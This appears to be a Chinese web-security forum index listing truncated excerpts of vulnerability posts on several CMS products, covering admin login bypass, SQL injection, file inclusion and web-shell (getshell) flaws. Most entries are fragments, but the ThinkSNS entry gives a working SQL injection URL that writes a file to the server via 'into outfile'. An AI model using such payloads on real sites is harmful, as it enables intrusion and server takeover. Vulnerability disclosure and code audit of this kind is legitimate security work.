Web安全
sdcms2.0后台绕过直接进入
By Cr4zyIslogin //判断登录的方法sub islogin()if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then dim t0,t1,t2t0=sdcms.getint(sdcms.loadcookie("adminid"),0) loadcookie t1=sdcms.loadcookie("islogin")t2=sdcms.loadcookie("loginkey")if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=
phpshe v1.1 多处文件包含与SQL注射漏洞等
/*******************************************************//* Phpshe v1.1 Vulnerability/* ========================/* By: : Kn1f3/* E-Mail : [email protected]/*========================/*******************************************************//* 90sec team /*******************************
csdjcms V 3.0 getshell Vulnerability
/*******************************************************//* csdjcms < V 3.0 getshell Vulnerability/* ======================== /* By: : Kn1f3 /* E-Mail : [email protected]/*======================== /*******************************************************//* 90sec t
红头船企业网站系统HTCCMS 漏洞分析
红头船企业网站系统HTCCMS 漏洞分析BY:风之传说一年木有玩黑了,最近一个月又重新拾取。。挺想念大家。这篇文章,肯定会让大牛笑话。那就当个抛砖引玉吧。另外,由于时间关系,这个程序没有接着看。 先发一篇文章吧,我怕又被清理了。。还有,那个啥漏洞板块我发不了文章,显示是没有权限的。。。我就
代码审计:易想团购系统通杀SQL注入漏洞分析
作者:Seay 博客:http://www.cnseay.com/ 转载请保留以上信息。 刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址function get_client_ip(){
跟风_thinkSNS
http://9.9.9.128/index.php?app=public&mod=Search&t=1&a=public&k=asd%27%29+union+select+1+into+outfile+%27c%3A%2F2.txt%27+%23爆路径index.php?act=userlist&app=widget&mod=乌云众测的,估计已经被挖滥了
thinksaas
http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2over
thinksns 3 getshell
wooyun test的重测试是这程序 结果我申请没让我进 听朋友说是这个我就大概看了下 就发现个getshell反正重测那么多黑客 肯定到时候有人挖出来 还不如放出来{:6_445:} attachaction.class.phppublic function capture(){error_reporting(0);//解析上传方式$query_string=t($_SERVER);parse_str($query_st
再爆espcms 最新注入漏洞
########################################### # Team:c0deplay######################################### if (is_array($att) && count($att) > 0) { foreach ($att as $key => $value) { if ($value) { $value = $this->fun->codecon($value, 'bg'); $db_where .= ' AND b.' . $key
易思企业系统Espcms注入漏洞+后台拿shell
作者:阿峰博客:www.afeng.org今天下午看到seay发表一篇文章,【Espcms 通杀 SQL注入漏洞分析附EXP+拿下官网】下载了他的exp,找了几个网站,都没有爆出来,成功率很低...,如图我就找他调侃了一会,刚开始他说也不知道是怎么回事,后来听他说知道了…不知道他是否更新了…关于漏洞文件和细节我就不说